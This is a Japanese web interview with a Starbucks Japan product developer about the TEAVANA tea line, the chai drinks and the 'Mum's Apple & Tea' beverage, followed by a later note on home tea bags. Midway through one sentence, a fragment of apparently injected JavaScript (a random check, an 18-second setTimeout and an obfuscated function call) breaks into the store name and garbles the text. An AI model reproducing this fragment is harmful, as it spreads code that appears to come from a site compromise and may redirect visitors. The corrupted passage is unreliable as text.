2017/03/02 追記

3/15(水)から、TEAVANAブランドに新たに、家庭用「TEAVANA」ティーバッグが登場です。ティーバッグ6種類&フルーツソース3種の販売がスタート。フルーツソースは日本オリジナルで、多彩な組み合わせが可能。フルーツと組み合わせたり、デザート感覚で楽しんだりと、ひと手間加えてTEAの概念を変えるような楽しくて美味しい体験ができそうです。一体どんなフレーバーになのか詳細を取材に行く予定なので、後日の記事公開をお楽しみに!

teavana_09
dots

スターバックス全店でティーラインを一新!

10月3日にスターバックス コーヒーがティーを一新したと発表がありました。スターバックスというとやはりコーヒーのイメージが強くて、皆さんティーを飲む機会は少ないかもしれません。今回はどのような想いでの変更だったのですか?

清水実はスターバックスって、アメリカでスタートしたときのお店の名前は「Starbucks Coffee, Tea andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}and Spices」だったんです。ティーも、店名にしっかりと入っていたんですね。

だから想い入れはあるのですが、やはり「スターバックスに行ったらコーヒー」というお客さまが大多数で。2013年よりアメリカで展開がスタートした「TEAVANA」ですが、ついに今年10月3日より日本での展開も始まりました。今回のリニューアルでは、そのTEAVANAを使ったメニューを導入しました。

teavana_01

ストレートの紅茶は、日本だと「家で飲むもの」というイメージがありますが……。

清水そうなんです。ですから、スターバックスの新ティーメニューは既成概念を超え、フルーツや花の香り、ハーブ、スパイスなどと組み合わせて、わざわざ足を運んでも飲みたいビバレッジメニューにしたいと考えています。

teavana_02

商品開発担当の清水拓さん

ネイバーフッド限定の“マムズ アップル & ティー”

ネイバーフッドではびっくりするような新しいメニュー提案や、お客さま自身がカスタムできる、飽きない工夫がたくさんありますが、「ここだけ」のメニューはありますか?

清水チャイだけでも3種類のメニューを展開します。お湯を注いでストレートに飲む「チャイ ティー」、スチームミルクとホームメイドシロップで仕上げる「チャイ ティー ラテ」、そしてスペシャルなのが「マムズ アップル & ティー」です。

なんですか、一番最後のおいしそうなネーミングは!

清水ネイバーフッドにはカスタムメニューとして軽く煮たクラッシュアップルがあるんですが、それを耐熱グラスの底に入れ、スチームで温めたアップルジュースと少量のオレンジジュースを注ぎます。そこにチャイのティーバッグを入れてゆっくりと抽出する特別ビバレッジメニューです。

teavana_03

teavana_04

teavana_05

わあ、おいしそう…! 名前の「マムズ」はなんですか?

清水風邪を引いたとき、お母さんがすりおろしりんごを食べさせてくれたイメージです。それから、寒い冬にテラスでお客さまが温かいドリンクで楽しんでいる情景も思い浮かべながらつくりました。

味も試行錯誤を重ねました。ベースに少しだけオレンジジュースを加えることで味に厚みが出ます。TEAVANAのチャイはスパイシーさが上品ですから、香りはすごく大人っぽく仕上がりました。ぜひ飲んでみてください。

teavana_06

アップルジュースだけでは出せない“味の厚み”

では、初めての味をいただきます。泡がブクブクしているのは、スチーマーで温めているからですね。りんごは混ぜるべき? 静かに飲むべき?

清水そこなんですよ! ネイバーフッドのメニューはお客さまベースですから、どうやって飲んでいただいてもいいと思っています。混ぜて果肉感を楽しむのもアリだと思いますし、そっとホットアップルジュースとして飲むのもアリです。

まずは混ぜずに飲んでみます。この甘酸っぱさは、アップルジュースとスパイスの重なりでしょうか。

清水それと、実はスターバックスが誇るおいしいオレンジジュースをちょっと加えているからですね。チャイのスパイシーさとの相性もよく、アップルジュースだけでは出せない“味の厚み”が表現できるんです。

teavana_07

時間を置くとまたグラスの中の様子が変わってきますね。

清水そういった時間の経過もネイバーフッドのメニューでは大事にしています。混ぜてみるとどうですか?

あ、温まったりんごが、たしかに“お母さんのすりおろしりんご”っぽいですね。そして、時間が経つことでスパイシーさが増しています!

清水もちろん、ここからお好みのカスタマイズをしてもいいと思いますよ。それがネイバーフッドの楽しみ方なんです。10月5日から販売スタートです。ぜひ飲んでみてください。

次回は10月11日(火)から毎日更新で、そんなネイバーフッドらしいメニュー展開について特集します。

dots

■ 教えてくれた人

清水 拓さん

スターバックス コーヒー ジャパン株式会社 プロダクトイノベーション部 R&Dチーム マネージャー。通常店のビバレッジメニュー開発を経て、現在は「スターバックス ネイバーフッド アンド コーヒー」「スターバックス イブニングス」のフード・ビバレッジメニュー開発を担当。

teavana_08
商品リスト
マムズ アップル & ティー
650円